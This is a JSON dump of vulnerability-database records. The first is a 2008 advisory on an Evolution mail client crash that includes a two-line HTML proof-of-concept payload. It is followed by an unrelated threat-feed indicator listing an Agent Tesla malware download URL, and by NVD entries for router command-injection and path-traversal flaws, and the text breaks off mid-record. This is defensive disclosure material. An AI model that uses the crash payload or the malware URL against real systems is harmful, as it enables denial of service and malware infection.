{"id": "SECURITYVULNS:DOC:20090", "bulletinFamily": "software", "title": "Evolution Vulnerability", "description": "\r\nApplication: Evolution 2.22.2\r\nOS: Linux - Ubuntu 8.04\r\n------------------------------------------------------\r\n1 - Description\r\n2 - Vulnerability\r\n3 - POC/EXPLOIT\r\n\r\n\r\n------------------------------------------------------\r\nDescription\r\n\r\nEvolution is an email client that is built with ubuntu.\r\n\r\n\r\n------------------------------------------------------\r\nVulnerability\r\n\r\n \r\nThe vulnerability works when mail is sent and specially armed with html code, this causes the client to break.\r\n\r\nAnalyzing with a debugger, you can see the failure with the following function.\r\n\r\n\r\n0xb7a219d7 in html_engine_get_view_width () from /usr/lib/libgtkhtml-3.14.so.19\r\n\r\n\r\n------------------------------------------------------\r\nPOC/EXPLOIT\r\n\r\n \r\nThe proof of concept can be done locally, \r\nwhen you save the following code in a html file and then load it into an e-mail from the new option "insert" and "html\r\nfile",\r\nas that could verify the client is broken.\r\n\r\n<IFRAME SRC="A"></IFRAME>\r\n<FRAMESET><FRAME SRC="A"></FRAMESET>\r\n\r\n------------------------------------------------------\r\nJuan Pablo Lopez Yacubian", "published": "2008-06-26T00:00:00", "modified": "2008-06-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20090", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:26", "edition": 1, "viewCount": 12, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-08-31T11:10:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2018-20090", "CVE-2019-20090", "CVE-2015-9286", "CVE-2008-7273", "CVE-2008-7272"]}, {"type": "openbugbounty", "idList": ["OBB:276351"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:26", "rev": 2}, "vulnersScore": 5.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"rst": [{"id": "RST:4146B61A-6C8C-3C37-951A-FFDFDFB1782B", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: http://198.12.84.79/20090/vbc.exe", "description": "Found **http://198[.]12.84.79/20090/vbc.exe** in [RST Threat Feed](https://rstcloud.net/profeed) with score **53**.\n First seen: 2021-10-13T03:00:00, Last seen: 2021-10-22T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **agent_tesla**.\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-23T00:00:00", "modified": "2021-10-13T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-10-22T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "bbaec72a0bea2d6f21e2b2a4f0b927dc"}, {"key": "domain", "hash": "e984b95caaf7240eacf4fa44ea596b9e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "941c7eabcd1b53cac0ff012ea558a7a7"}, {"key": "iocType", "hash": "572d4e421e5e6b9bc11d815e8a027112"}, {"key": "ip", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "367bec30c0ba4b1e1089ea2e16dc01df"}, {"key": "published", "hash": "ec8f309aaf165e5995cf2ed51d703d40"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "13dea883b752e2629bfcc86e61e3a06c"}, {"key": "threat", "hash": "f2b96bc1a05f04d26ff87ac58cb2ed6f"}, {"key": "title", "hash": "65b808d04f163cd9c8e6a29fcb5c7fd2"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d5de06ffa9735df4c3c9ad8cc195051d"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "b7b649735088da2c88b6f8dacf9d2652147886c480a64e63eb7ebfdf0af5b2ab", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "url", "ip": [], "domain": ["http"], "url": ["http://198.12.84.79/20090/vbc.exe"], "iocScore": {"ioc_frequency": 0.85, "ioc_src": 70.58, "ioc_tags": 0.89, "ioc_total": 53.0}, "tags": ["malware"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {}, "asn": {}, "threat": ["agent_tesla"]}], "cve": [{"id": "CVE-2021-20122", "bulletinFamily": "NVD", "title": "CVE-2021-20122", "description": "The Telus Wi-Fi Hub (PRV65B444A-S-TS) with firmware version 3.00.20 is affected by an authenticated command injection vulnerability in multiple parameters passed to tr69_cmd.cgi. A remote attacker connected to the router's LAN and authenticated with a super user account, or using a bypass authentication vulnerability like CVE-2021-20090 could leverage this issue to run commands or gain a shell as root on the target device.", "published": "2021-10-11T17:15:00", "modified": "2021-10-18T18:39:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20122", "reporter": "vulnreport@tenable.com", "references": ["https://www.tenable.com/security/research/tra-2021-41"], "cvelist": ["CVE-2021-20122"], "immutableFields": [], "type": "cve", "lastseen": "2021-10-19T07:28:53", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-20122"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "The Telus Wi-Fi Hub (PRV65B444A-S-TS) with firmware version 3.00.20 is affected by an authenticated command injection vulnerability in multiple parameters passed to tr69_cmd.cgi. A remote attacker connected to the router's LAN and authenticated with a super user account, or using a bypass authentication vulnerability like CVE-2021-20090 could leverage this issue to run commands or gain a shell as root on the target device.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-10-13T09:58:31", "references": [], "rev": 2}, "score": {"modified": "2021-10-13T09:58:31", "rev": 2, "value": 3.7, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.tenable.com/security/research/tra-2021-41", "refsource": "MISC", "tags": [], "url": "https://www.tenable.com/security/research/tra-2021-41"}], "hash": "aa0d8ca4eef5c6cbf20e6fab57a808bc82aaee5f4f770884ef6047cfbd120bb5", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "166105e90893fac81c42deab7dcbd808", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "40f946729a5387ea5c03b4343b60e461", "key": "published"}, {"hash": "9e1342b2c9430baf1eff4d7ffe72a006", "key": "href"}, {"hash": "758a63c5e1972186057f66bac3cbb3c0", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "a01e87a887f08f67b13463a8848314d7", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "2beebe39c002a927a1eac9faaff124b0", "key": "title"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "1f2e0db06f601ba30519c4db50516901", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "9f126a3a42b1f39393a3fdd0ccc94782", "key": "cvelist"}, {"hash": "1820aa677b5bd2704c3357ad453659df", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20122", "id": "CVE-2021-20122", "immutableFields": [], "lastseen": "2021-10-13T09:58:31", "modified": "2021-10-12T10:52:00", "objectVersion": "1.6", "published": "2021-10-11T17:15:00", "references": ["https://www.tenable.com/security/research/tra-2021-41"], "reporter": "vulnreport@tenable.com", "title": "CVE-2021-20122", "type": "cve", "viewCount": 4}, "different_elements": ["extraReferences", "cpe23", "cvss", "modified", "cpe", "affectedConfiguration", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 2, "lastseen": "2021-10-13T09:58:31"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-20122"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "The Telus Wi-Fi Hub (PRV65B444A-S-TS) with firmware version 3.00.20 is affected by an authenticated command injection vulnerability in multiple parameters passed to tr69_cmd.cgi. A remote attacker connected to the router's LAN and authenticated with a super user account, or using a bypass authentication vulnerability like CVE-2021-20090 could leverage this issue to run commands or gain a shell as root on the target device.", "edition": 1, "enchantments": {}, "extraReferences": [{"name": "https://www.tenable.com/security/research/tra-2021-41", "refsource": "MISC", "tags": [], "url": "https://www.tenable.com/security/research/tra-2021-41"}], "hash": "ad4ac555fc204607504ad2603d9e60c056526b49ac740d518fc3ed2dbb3f641a", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "166105e90893fac81c42deab7dcbd808", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "40f946729a5387ea5c03b4343b60e461", "key": "published"}, {"hash": "9e1342b2c9430baf1eff4d7ffe72a006", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "a01e87a887f08f67b13463a8848314d7", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "2beebe39c002a927a1eac9faaff124b0", "key": "title"}, {"hash": "40f946729a5387ea5c03b4343b60e461", "key": "modified"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "1f2e0db06f601ba30519c4db50516901", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "9f126a3a42b1f39393a3fdd0ccc94782", "key": "cvelist"}, {"hash": "1820aa677b5bd2704c3357ad453659df", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20122", "id": "CVE-2021-20122", "immutableFields": [], "lastseen": "2021-10-12T19:58:33", "modified": "2021-10-11T17:15:00", "objectVersion": "1.6", "published": "2021-10-11T17:15:00", "references": ["https://www.tenable.com/security/research/tra-2021-41"], "reporter": "vulnreport@tenable.com", "title": "CVE-2021-20122", "type": "cve", "viewCount": 0}, "different_elements": ["modified"], "edition": 1, "lastseen": "2021-10-12T19:58:33"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "8651e480d5f4a20d8898230fd6839892"}, {"key": "affectedSoftware", "hash": "3708d6ff39e1ed47bc30cdb9bbedf933"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "89b0cd651193f21feeab2b0e8f9e3c69"}, {"key": "cpe23", "hash": "31f470a650ad6185a08f201e34dbeb7d"}, {"key": "cpeConfiguration", "hash": "948439da3152196e0a6e1adbfca6ac9d"}, {"key": "cvelist", "hash": "9f126a3a42b1f39393a3fdd0ccc94782"}, {"key": "cvss", "hash": "62e86bb7716385cd46817416916a7bbd"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "ff28c24ae495e495a5a9ef41661a6644"}, {"key": "description", "hash": "a01e87a887f08f67b13463a8848314d7"}, {"key": "extraReferences", "hash": "35756d1ad9ce0b06ba72eec92d6e6304"}, {"key": "href", "hash": "9e1342b2c9430baf1eff4d7ffe72a006"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "126cf9924bb1f29f62a63b0d7ef7cadb"}, {"key": "published", "hash": "40f946729a5387ea5c03b4343b60e461"}, {"key": "references", "hash": "1f2e0db06f601ba30519c4db50516901"}, {"key": "reporter", "hash": "1820aa677b5bd2704c3357ad453659df"}, {"key": "title", "hash": "2beebe39c002a927a1eac9faaff124b0"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "88a45a1c292dd23ca1af067470e211e498f07701abc9a4bb1018f4846d798aa5", "viewCount": 5, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-19T07:28:53", "rev": 2}, "score": {"value": 3.7, "vector": "NONE", "modified": "2021-10-19T07:28:53", "rev": 2}}, "objectVersion": "1.6", "cpe": ["cpe:/o:telus:prv65b444a-s-ts_firmware:3.00.20"], "affectedSoftware": [{"cpeName": "telus:prv65b444a-s-ts_firmware", "name": "telus prv65b444a-s-ts firmware", "operator": "eq", "version": "3.00.20"}], "affectedConfiguration": [{"cpeName": "telus:prv65b444a-s-ts", "name": "telus prv65b444a-s-ts", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:telus:prv65b444a-s-ts:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:telus:prv65b444a-s-ts_firmware:3.00.20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://www.tenable.com/security/research/tra-2021-41", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.tenable.com/security/research/tra-2021-41"}], "cpe23": ["cpe:2.3:o:telus:prv65b444a-s-ts_firmware:3.00.20:*:*:*:*:*:*:*"], "cwe": ["CWE-77"], "scheme": null}, {"id": "CVE-2021-38703", "bulletinFamily": "NVD", "title": "CVE-2021-38703", "description": "Wireless devices running certain Arcadyan-derived firmware (such as KPN Experia WiFi 1.00.15) do not properly sanitise user input to the syslog configuration form. An authenticated remote attacker could leverage this to alter the device configuration and achieve remote code execution. This can be exploited in conjunction with CVE-2021-20090.", "published": "2021-09-01T12:15:00", "modified": "2021-09-13T14:11:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38703", "reporter": "cve@mitre.org", "references": ["https://www.kpnwebshop.com/modems-routers/producten/experia-wifi/2", "https://7bits.nl/journal/posts/cve-2021-38703-kpn-experia-wifi-root-shell/"], "cvelist": ["CVE-2021-38703"], "immutableFields": [], "type": "cve", "lastseen": "2021-09-14T15:28:33", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-38703"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Wireless devices running certain Arcadyan-derived firmware (such as KPN Experia WiFi 1.00.15) do not properly sanitise user input to the syslog configuration form. An authenticated remote attacker could leverage this to alter the device configuration and achieve remote code execution. This can be exploited in conjunction with CVE-2021-20090.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-09-02T07:25:36", "references": [], "rev": 2}, "score": {"modified": "2021-09-02T07:25:36", "rev": 2, "value": 4.8, "vector": "NONE"}}, "extraReferences": [{"name": "https://7bits.nl/journal/posts/cve-2021-38703-kpn-experia-wifi-root-shell/", "refsource": "MISC", "tags": [], "url": "https://7bits.nl/journal/posts/cve-2021-38703-kpn-experia-wifi-root-shell/"}, {"name": "https://www.kpnwebshop.com/modems-routers/producten/experia-wifi/2", "refsource": "MISC", "tags": [], "url": "https://www.kpnwebshop.com/modems-routers/producten/experia-wifi/2"}], "hash": "8ba522f2199b8e24344c8d5ca5c4faf4d24dd9edd8bf8d698842c7a7ff572f14", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "e114f259841f5c808ff8a30a330a0f2d", "key": "published"}, {"hash": "8ff4a047377be38375dc26613fc2fcf3", "key": "description"}, {"hash": "6220e1fcf8a970fd25979395d61e4177", "key": "cvelist"}, {"hash": "e1541c660988a7d16807d5599f2268a3", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ecc5c9337cc10536311e41ab542f8620", "key": "references"}, {"hash": "400c3eacd93c116e6ecfe7d15ae95ddd", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "963e3b1736f2c99447f6369464518675", "key": "href"}, {"hash": "38c730d90122631c19060208f456b039", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38703", "id": "CVE-2021-38703", "immutableFields": [], "lastseen": "2021-09-02T07:25:36", "modified": "2021-09-01T13:01:00", "objectVersion": "1.6", "published": "2021-09-01T12:15:00", "references": ["https://www.kpnwebshop.com/modems-routers/producten/experia-wifi/2", "https://7bits.nl/journal/posts/cve-2021-38703-kpn-experia-wifi-root-shell/"], "reporter": "cve@mitre.org", "title": "CVE-2021-38703", "type": "cve", "viewCount": 3}, "different_elements": ["extraReferences", "cpe23", "cvss", "modified", "cpe", "affectedConfiguration", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-09-02T07:25:36"}], "edition": 2, "hashmap": [{"key": "affectedConfiguration", "hash": "741e33dc29fe1afc19d2e33454fe0720"}, {"key": "affectedSoftware", "hash": "5675db27e6f0aae7affcb17255efb690"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "39ee07ecbde1fd9d220cc2df94be6267"}, {"key": "cpe23", "hash": "1293c11bf8895567b8feb66c9f1816fd"}, {"key": "cpeConfiguration", "hash": "3865a5ead1707b15d8f40f7f968dfbc4"}, {"key": "cvelist", "hash": "6220e1fcf8a970fd25979395d61e4177"}, {"key": "cvss", "hash": "62e86bb7716385cd46817416916a7bbd"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "8ff4a047377be38375dc26613fc2fcf3"}, {"key": "extraReferences", "hash": "0d1d6c8b90c377f10e0b2714756f5974"}, {"key": "href", "hash": "963e3b1736f2c99447f6369464518675"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "04cdadfda34b6c278e53fe3ef97474ad"}, {"key": "published", "hash": "e114f259841f5c808ff8a30a330a0f2d"}, {"key": "references", "hash": "ecc5c9337cc10536311e41ab542f8620"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "38c730d90122631c19060208f456b039"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "4d870cec77693469e6e3a757bf85fff9de63f5209822656f3b4aba28b58613a8", "viewCount": 4, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-14T15:28:33", "rev": 2}, "score": {"value": 4.8, "vector": "NONE", "modified": "2021-09-14T15:28:33", "rev": 2}}, "objectVersion": "1.6", "cpe": ["cpe:/o:kpn:experia_wifi_firmware:1.00.15"], "affectedSoftware": [{"cpeName": "kpn:experia_wifi_firmware", "name": "kpn experia wifi firmware", "operator": "eq", "version": "1.00.15"}], "affectedConfiguration": [{"cpeName": "kpn:experia_wifi", "name": "kpn experia wifi", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:kpn:experia_wifi_firmware:1.00.15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:h:kpn:experia_wifi:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://7bits.nl/journal/posts/cve-2021-38703-kpn-experia-wifi-root-shell/", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://7bits.nl/journal/posts/cve-2021-38703-kpn-experia-wifi-root-shell/"}, {"name": "https://www.kpnwebshop.com/modems-routers/producten/experia-wifi/2", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://www.kpnwebshop.com/modems-routers/producten/experia-wifi/2"}], "cpe23": ["cpe:2.3:o:kpn:experia_wifi_firmware:1.00.15:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null}, {"id": "CVE-2021-20090", "bulletinFamily": "NVD", "title": "CVE-2021-20090", "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.", "published": "2021-04-29T15:15:00", "modified": "2021-07-20T22:15:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20090", "reporter": "vulnreport@tenable.com", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://www.kb.cert.org/vuls/id/914124"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "type": "cve", "lastseen": "2021-08-04T15:52:30", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-20090"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-30T09:42:14", "references": [], "rev": 2}, "score": {"modified": "2021-04-30T09:42:14", "rev": 2, "value": 6.3, "vector": "NONE"}, "twitter": {"counter": 6, "modified": "2021-04-30T09:42:14", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1391673250812399623", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-20090 (wsr-2533dhpl2-bk_firmware, wsr-2533dhp3-bk_firmware)) has been published on https://t.co/bwDSzXihMu?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1390894328411791363", "text": " NEW: CVE-2021-20090 A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers ... (click for more) Severity: CRITICAL https://t.co/769YAufGBy?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1391673284329099264", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-20090 (wsr-2533dhpl2-bk_firmware, wsr-2533dhp3-bk_firmware)) has been published on https://t.co/IRH3LshCEd?amp=1"}, {"link": "https://twitter.com/FortifiedITLtd/status/1389626197387235330", "text": "CVE-2021-20090\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication"}, {"link": "https://twitter.com/FortifiedITLtd/status/1389626197387235330", "text": "CVE-2021-20090\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication"}, {"link": "https://twitter.com/threatintelctr/status/1391075525033140225", "text": " NEW: CVE-2021-20090 A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers ... (click for more) Severity: CRITICAL https://t.co/769YAufGBy?amp=1"}]}}, "extraReferences": [{"name": "https://www.tenable.com/security/research/tra-2021-13", "refsource": "MISC", "tags": [], "url": "https://www.tenable.com/security/research/tra-2021-13"}], "hash": "32eb8065cf1465aae6c3bccb315578905a25d4dcc247de21187cfbad9749ec7c", "hashmap": [{"hash": "fe94e7c1c996c377671c3290e4ced302", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "431d91abfd47d1fcebb8c159419b3503", "key": "references"}, {"hash": "dd2bb057a9241e040a45d2e893c27b94", "key": "title"}, {"hash": "7dfa269c3282c554737011688a83d36b", "key": "description"}, {"hash": "978efc8e6bfdf1fb0f8ab9f84526f625", "key": "cvelist"}, {"hash": "39d7c5af3a5808cabdb50976a6f7fe00", "key": "modified"}, {"hash": "c65401b38827a50cb381b3b908cbc204", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "5ed4fd1217b0877e8b4ac0426d406e97", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "1820aa677b5bd2704c3357ad453659df", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20090", "id": "CVE-2021-20090", "immutableFields": [], "lastseen": "2021-04-30T09:42:14", "modified": "2021-04-29T15:29:00", "objectVersion": "1.5", "published": "2021-04-29T15:15:00", "references": ["https://www.tenable.com/security/research/tra-2021-13"], "reporter": "vulnreport@tenable.com", "title": "CVE-2021-20090", "type": "cve", "viewCount": 0}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "affectedConfiguration", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-30T09:42:14"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "buffalo:wsr-2533dhpl2-bk", "name": 